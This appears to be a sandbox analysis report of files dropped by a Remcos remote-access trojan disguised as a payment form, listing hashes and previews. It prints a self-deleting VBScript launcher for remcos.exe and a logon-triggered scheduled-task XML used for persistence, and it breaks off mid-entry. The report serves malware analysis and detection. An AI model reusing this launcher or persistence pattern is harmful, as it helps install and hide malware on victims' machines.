                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:false
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\json[1].json

                                            Download File
                                            Process:C:\ProgramData\AppUpdate\remcos.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):962
                                            Entropy (8bit):5.01442467270497
                                            Encrypted:false
                                            SSDEEP:12:tkluQ+nd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluQydVauKyGX85jvXhNlT3/7AcV9Wro
                                            MD5:4A8FAD17775993221C3AD2D68BB4B306
                                            SHA1:DB42C3975A64E7B4CE2A93FF5AF91F2DF73C82BD
                                            SHA-256:893F1B254D4EC2484868976F1B62D5A064909EA08E46F95193DBE79DB435E604
                                            SHA-512:63252CFDC2CC7A32F86D9CB5D27E1695A8C138EBFBF476741C017EB349F20BDC72FF5856E0044DB189BAABDB1C3819C29FFC33A054810BD0354726300063D52C
                                            Malicious:false
                                            Preview:{. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):2232
                                            Entropy (8bit):5.380531179760856
                                            Encrypted:false
                                            SSDEEP:48:DWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:DLHyIFKL3IZ2KRH9Oug8s
                                            MD5:AF312D1F700C41D79551F4CDD0EFF746
                                            SHA1:852C22E41E76C0CA8B52390591380ED383BC9045
                                            SHA-256:A688022D6C85661C85C135EEA8F769F9597A592B98720481B64610E616D02019
                                            SHA-512:3D5B3095D11E1EF79C6137610C686AF95E75AE2ABCF377B854A1220ACCA7EA156F3CE43372004A06FFABF5A9ED7B29A6DD3A4BE9CD263E038771F44206300A33
                                            Malicious:false
                                            Preview:@...e.................................\..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5bvteasq.byk.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ck3jahf.xdv.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gzriopa.nk4.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lppr5wp.q10.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5uuez0bu.mdn.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eaysxlmq.akc.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ei2fuhm4.klh.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewjzv31p.pux.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ftdo44dy.d0z.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mcotteu2.b0o.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n2ocsrhx.50g.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5nf40lo.xkn.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svfcbaio.pvp.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ucbslr0g.3rg.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_unw55lwl.hy1.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfvg3oj4.xrw.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\install.vbs

                                            Download File
                                            Process:C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):392
                                            Entropy (8bit):3.471121212518824
                                            Encrypted:false
                                            SSDEEP:12:4D8o++ugypjBQMBvFQ4lOnbtwD2F0M/0aimi:4Dh+S0FNObCD2F0Nait
                                            MD5:046708368578D720D91FB9CEECEC742E
                                            SHA1:1DC732F67F48A1D5694F4CF14A8D279DBD1D6EE6
                                            SHA-256:04F4EDC28E97A16F93CF7ACAC864ABA17CC467282550AE61BAAC719262BE6F5E
                                            SHA-512:9106F645EE74C9E061FCB396A00D706512D41054A356125F26A10D42390D8F0D3EA3DD785393BF5DE358B62464EC3C0F7D2E27411E87BB408581F820C427E7F0
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            Preview:W.S.c.r.i.p.t...S.l.e.e.p. .1.0.0.0...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...R.u.n. .".c.m.d. ./.c. .".".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.A.p.p.U.p.d.a.t.e.\.r.e.m.c.o.s...e.x.e.".".".,. .0...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

                                            C:\Users\user\AppData\Local\Temp\tmp854C.tmp

                                            Download File
                                            Process:C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1567
                                            Entropy (8bit):5.084521571205805
                                            Encrypted:false
                                            SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewwv:HeLwYrFdOFzOz6dKrsuqJ
                                            MD5:6578CACDE83BF5ACF30B8C6DDC42668F
                                            SHA1:7A1E7B51BA98D16C8929FF1A2AE3F541177CA1BD
                                            SHA-256:62967F2891D193BC27221BEBE231C99252EA3C011C8EB97A839F5AD2DE04228E
                                            SHA-512:F2B9E8B4B20BC553E32BBA96C5E1AA3B614F478FEA308BD3CE8FE0045C7B2A79A5169F4EEAD2E6DE128FC2BB282852E681360FA66FE3496367C95B1463460753
                                            Malicious:true
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                            C:\Users\user\AppData\Local\Temp\tmpAC9A.tmp

                                            Download File
                                            Process:C:\ProgramData\AppUpdate\remcos.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1567
                                            Entropy (8bit):5.084521571205805
                                            Encrypted:false
                                            SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewwv:HeLwYrFdOFzOz6dKrsuqJ
                                            MD5:6578CACDE83BF5ACF30B8C6DDC42668F
                                            SHA1:7A1E7B51BA98D16C8929FF1A2AE3F541177CA1BD
                                            SHA-256:62967F2891D193BC27221BEBE231C99252EA3C011C8EB97A839F5AD2DE04228E
                                            SHA-512:F2B9E8B4B20BC553E32BBA96C5E1AA3B614F478FEA308BD3CE8FE0045C7B2A79A5169F4EEAD2E6DE128FC2BB282852E681360FA66FE3496367C95B1463460753
                                            Malicious:false
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                            C:\Users\user\AppData\Local\Temp\tmpCD42.tmp

                                            Download File
                                            Process:C:\ProgramData\AppUpdate\remcos.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1567
                                            Entropy (8bit):5.084521571205805
                                            Encrypted:false
                                            SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewwv:HeLwYrFdOFzOz6dKrsuqJ
                                            MD5:6578CACDE83BF5ACF30B8C6DDC42668F
                                            SHA1:7A1E7B51BA98D16C8929FF1A2AE3F541177CA1BD
                                            SHA-256:62967F2891D193BC27221BEBE231C99252EA3C011C8EB97A839F5AD2DE04228E
                                            SHA-512:F2B9E8B4B20BC553E32BBA96C5E1AA3B614F478FEA308BD3CE8FE0045C7B2A79A5169F4EEAD2E6DE128FC2BB282852E681360FA66FE3496367C95B1463460753
                                            Malicious:false
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                            C:\Users\user\AppData\Local\Temp\tmpCDB.tmp

                                            Download File
                                            Process:C:\ProgramData\AppUpdate\remcos.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1567
                                            Entropy (8bit):5.084521571205805
                                            Encrypted:false
                                            SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewwv:HeLwYrFdOFzOz6dKrsuqJ
                                            MD5:6578CACDE83BF5ACF30B8C6DDC42668F
                                            SHA1:7A1E7B51BA98D16C8929FF1A2AE3F541177CA1BD
                                            SHA-256:62967F2891D193BC27221BEBE231C99252EA3C011C8EB97A839F5AD2DE04228E
                                            SHA-512:F2B9E8B4B20BC553E32BBA96C5E1AA3B614F478FEA308BD3CE8FE0045C7B2A79A5169F4EEAD2E6DE128FC2BB282852E681360FA66FE3496367C95B1463460753
                                            Malicious:false
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                            C:\Users\user\AppData\Local\Temp\tmpED6C.tmp

                                            Download File
                                            Process:C:\ProgramData\AppUpdate\remcos.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1567
                                            Entropy (8bit):5.084521571205805
                                            Encrypted:false
                                            SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewwv:HeLwYrFdOFzOz6dKrsuqJ
                                            MD5:6578CACDE83BF5ACF30B8C6DDC42668F
                                            SHA1:7A1E7B51BA98D16C8929FF1A2AE3F541177CA1BD
